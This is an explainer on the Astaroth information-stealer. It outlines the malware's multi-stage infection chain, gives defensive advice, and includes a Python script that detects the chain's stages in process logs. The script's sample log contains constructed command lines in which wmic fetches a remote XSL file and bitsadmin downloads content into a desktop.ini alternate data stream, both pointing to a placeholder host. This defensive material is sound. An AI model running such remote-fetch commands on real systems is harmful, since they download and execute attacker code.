Pre-requisite: Malware
Astaroth malware was first detected in late 2017 in multiple countries and has since been used in various cyberattacks. It is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America.
What does Astaroth do?
Astaroth is known as an information stealer. It transfers confidential information from an infected victim, such as account IDs and passwords, keystrokes, and other data, to the attacker.
It runs in the memory of infected computers. It also abuses built-in system binaries, such as the Windows Management Instrumentation Command-line tool (WMIC), to silently download and execute malware payloads in the background.
How does Astaroth work?
- Initially, the attacker sends a spear-phishing email containing a URL to a compressed (ZIP) archive that holds a shortcut (.LNK) file with a spoofed file name.
- When the user clicks that link, the ZIP file is downloaded silently. The LNK file inside it runs WMIC, which fetches and runs an XSL file.
- The XSL file contains a one-line JavaScript payload that runs via explorer.exe, which in turn fetches the main script and runs it in memory.
- Using bitsadmin.exe, the main script downloads encrypted binary content and copies it into an Alternate Data Stream (ADS) of desktop.ini. It then deletes the downloaded binary and starts the process again, repeating it 11 times.
- The main script also uses bitsadmin.exe to download three more binary blobs, which it combines to form the first-stage malware code.
- The script calls ExtExport.exe, which loads the first-stage malware code using a DLL hijacking technique.
- The first-stage malware decrypts and combines three ADS streams in desktop.ini to form the second-stage malware.
- The second-stage malware in turn reads and decrypts the third-stage malware.
- The third-stage malware is injected into userinit.exe using the process hollowing technique. The injected code reads and decrypts the final-stage malware code, which is Astaroth.
- Astaroth reads and decrypts various plugins from the ADS streams in desktop.ini. The plugins allow Astaroth to steal email passwords, steal browser passwords, and enumerate installed security software.
How To Protect Yourself from Astaroth?
- Keep software updated: Most attackers look for a vulnerability in a system, so patching vulnerabilities through software updates is a critical part of protecting a network against malware.
- Disable unnecessary tools: Leaving every tool enabled with administrative permissions, even when it is not in use, gives malware a way to take control of the system, so disable the tools that are not in use.
- Implement strict access controls: Use multi-factor authentication (such as 2-factor authentication), antivirus, and firewalls, and give users only the access privileges they need.
- Carry out continuous monitoring: Monitor running programs, scan continuously for malicious code, and use network monitoring software to detect suspicious activity on the network. In particular, watch for unknown programs launched from the command line.
- Verify attachments from unknown sources before opening them: Before opening any attachment from an unknown source, verify the sender's identity and scan the attachment, so that malware attacks can be prevented.
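The monitoring advice above is most useful when it is tied to the concrete stages of the infection chain described earlier (WMIC loading an XSL file, bitsadmin.exe downloads, data written into alternate data streams of desktop.ini, ExtExport.exe being launched, and userinit.exe being used as an injection target). The following script is an added example, not code from the original article, that runs simple detection rules for those stages over constructed process-creation log lines. The log format ("parent|image|commandline" per line), the placeholder URLs and paths, and the rule names are assumptions made for the example; in practice the same checks would be applied to Sysmon or EDR process-creation events.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcEvent:
    """One process-creation event: parent image, new image, command line."""
    parent: str
    image: str
    cmdline: str


# Constructed sample log (hypothetical): "parent|image|commandline" per line,
# modelled on the stages described above. URLs and paths are placeholders.
SAMPLE_LOG = """\
explorer.exe|wmic.exe|wmic os get /format:"https://example.invalid/v.xsl"
explorer.exe|bitsadmin.exe|bitsadmin /transfer job1 https://example.invalid/a.bin C:\\Users\\Public\\desktop.ini:s1
explorer.exe|ExtExport.exe|ExtExport.exe C:\\Users\\Public\\ C:\\Users\\Public\\
explorer.exe|userinit.exe|userinit.exe
winlogon.exe|userinit.exe|userinit.exe
explorer.exe|notepad.exe|notepad.exe C:\\Users\\me\\notes.txt
"""

# Matches "desktop.ini:<streamname>", i.e. an alternate data stream of desktop.ini.
ADS_RE = re.compile(r"desktop\.ini:[^\s\\/:]+", re.IGNORECASE)
# Matches a URL or an .xsl file name given to wmic's /format: switch.
REMOTE_XSL_RE = re.compile(r"https?://|\.xsl\b", re.IGNORECASE)


def wmic_remote_xsl(e: ProcEvent) -> bool:
    """WMIC asked to apply a remote or XSL stylesheet via /format: (XSL stage)."""
    return (e.image.lower() == "wmic.exe"
            and "/format:" in e.cmdline.lower()
            and REMOTE_XSL_RE.search(e.cmdline) is not None)


def bitsadmin_transfer(e: ProcEvent) -> bool:
    """bitsadmin.exe used to download content (binary download stage)."""
    return e.image.lower() == "bitsadmin.exe" and "/transfer" in e.cmdline.lower()


def ads_on_desktop_ini(e: ProcEvent) -> bool:
    """Command line writes to or reads an alternate data stream of desktop.ini."""
    return ADS_RE.search(e.cmdline) is not None


def extexport_launch(e: ProcEvent) -> bool:
    """ExtExport.exe is rarely run by users; any launch is worth reviewing (assumption)."""
    return e.image.lower() == "extexport.exe"


def userinit_unusual_parent(e: ProcEvent) -> bool:
    """userinit.exe is normally started by winlogon.exe; other parents are suspicious."""
    return e.image.lower() == "userinit.exe" and e.parent.lower() != "winlogon.exe"


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("wmic_remote_xsl", wmic_remote_xsl),
    ("bitsadmin_transfer", bitsadmin_transfer),
    ("ads_on_desktop_ini", ads_on_desktop_ini),
    ("extexport_launch", extexport_launch),
    ("userinit_unusual_parent", userinit_unusual_parent),
]


def parse_log(text: str) -> List[ProcEvent]:
    """Parse the simplified 'parent|image|commandline' format into events."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parent, image, cmdline = line.split("|", 2)
        events.append(ProcEvent(parent.strip(), image.strip(), cmdline.strip()))
    return events


def detect(text: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, rule name) for every rule that fires."""
    findings = []
    for line_no, event in enumerate(parse_log(text), start=1):
        for name, rule in RULES:
            if rule(event):
                findings.append((line_no, name))
    return findings


def stages_hit(findings: List[Tuple[int, str]]) -> int:
    """Number of distinct chain stages seen; several on one host is high confidence."""
    return len({name for _, name in findings})


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for line_no, name in hits:
        print(f"line {line_no}: {name}")
    print(f"{stages_hit(hits)} distinct stages matched")
```

Each rule on its own can fire on legitimate administration (bitsadmin.exe is a normal Windows component), so the count of distinct stages observed on one host, rather than any single hit, is what should drive an alert.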